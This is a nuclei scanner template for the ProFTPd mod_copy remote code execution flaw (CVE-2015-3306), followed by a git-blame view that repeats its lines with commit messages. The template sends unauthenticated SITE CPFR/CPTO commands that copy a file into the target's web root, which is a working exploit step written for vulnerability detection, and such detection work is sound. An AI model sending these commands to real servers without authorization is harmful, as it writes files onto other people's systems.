nuclei-templates/cves/2015/CVE-2015-3306.yaml

id: CVE-2015-3306

info:
  name: ProFTPd RCE
  author: pd-team
  severity: high
  reference: https://github.com/t0kx/exploit-CVE-2015-3306
  tags: cve,cve2015,ftp,rce,network

network:
  - inputs:
      - data: "site cpfr /proc/self/cmdline\r\n"
        read: 1024
      - data: "site cpto /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpfr /tmp/.{{randstr}}\r\n"
        read: 1024
      - data: "site cpto /var/www/html/{{randstr}}\r\n"
    host:
      - "{{Hostname}}:21"

    read-size: 1024
    matchers:
      - type: word
        words:
          - "Copy successful"
        part: raw
:fire: Add CVE-2015-3306 2021-02-23 22:13:48 +00:00			`id: CVE-2015-3306`

			`info:`
			`name: ProFTPd RCE`
			`author: pd-team`
			`severity: high`
			`reference: https://github.com/t0kx/exploit-CVE-2015-3306`
Update CVE-2015-3306.yaml 2021-03-11 15:14:26 +00:00			`tags: cve,cve2015,ftp,rce,network`
:fire: Add CVE-2015-3306 2021-02-23 22:13:48 +00:00
			`network:`
			`- inputs:`
			`- data: "site cpfr /proc/self/cmdline\r\n"`
			`read: 1024`
			`- data: "site cpto /tmp/.{{randstr}}\r\n"`
			`read: 1024`
			`- data: "site cpfr /tmp/.{{randstr}}\r\n"`
			`read: 1024`
			`- data: "site cpto /var/www/html/{{randstr}}\r\n"`
			`host:`
:hammer: Move port inside host 2021-03-10 07:30:35 +00:00			`- "{{Hostname}}:21"`
Update CVE-2015-3306.yaml 2021-03-11 15:14:26 +00:00
:fire: Add CVE-2015-3306 2021-02-23 22:13:48 +00:00			`read-size: 1024`
			`matchers:`
			`- type: word`
			`words:`
Update CVE-2015-3306.yaml 2021-03-11 15:14:26 +00:00			`- "Copy successful"`
			`part: raw`